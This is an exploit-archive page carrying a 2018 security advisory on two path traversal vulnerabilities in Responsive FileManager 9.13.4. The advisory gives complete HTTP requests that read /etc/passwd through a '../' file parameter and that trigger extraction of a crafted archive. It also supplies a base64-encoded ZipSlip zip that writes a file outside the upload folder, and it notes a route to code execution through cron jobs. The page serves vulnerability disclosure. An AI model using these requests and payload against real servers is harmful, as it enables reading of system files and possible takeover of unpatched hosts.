Responsive FileManager 9.13.4 Path Traversal

Responsive FileManager 9.13.4 Path Traversal: Posted Aug 23, 2018; Authored by Simon Uvarov; Responsive FileManager version 9.13.4 suffers from multiple path traversal vulnerabilities.; tags | exploit, vulnerability, file inclusion; advisories | CVE-2018-15535, CVE-2018-15536; SHA-256 | 1c0b5e62101ed7a3b0bbaf833ad6aaf9db23b235f9be4b1afcc438fd06376308; Download | Favorite | View

Responsive FileManager 9.13.4 Path Traversal

The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com

#1 Path Traversal Allows to Read Any File

Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed

Details:

The following request allows a user to read any file on the system.

    GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
    X-Requested-With: XMLHttpRequest
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close

#2 Path Traversal While Upacking Archives

Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed

The following request starts unpacking the exploit.zip archive:

    POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 16
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close
   
    path=exploit.zip

Bases64-encoded example of exploit.zip which creates source.txt in /tmp/ directory:

    UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
    L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
    AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
    AAAAAQABAFQAAABSAAAAAAA=

It is possible to create archives containing ../../ as a part of a file path, now it's famous as ZipSlip vulnerability, but it's an old bug.

It is impossible to upload .php files or .htaccess file using this method, but itas possible to create different files with "legal" extensions on a system and it may lead to remote code execution if a server runs with enough privileges, for example, to create cron jobs.

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Responsive FileManager 9.13.4 Path Traversal

Responsive FileManager 9.13.4 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Responsive FileManager 9.13.4 Path Traversal

Share This

Responsive FileManager 9.13.4 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems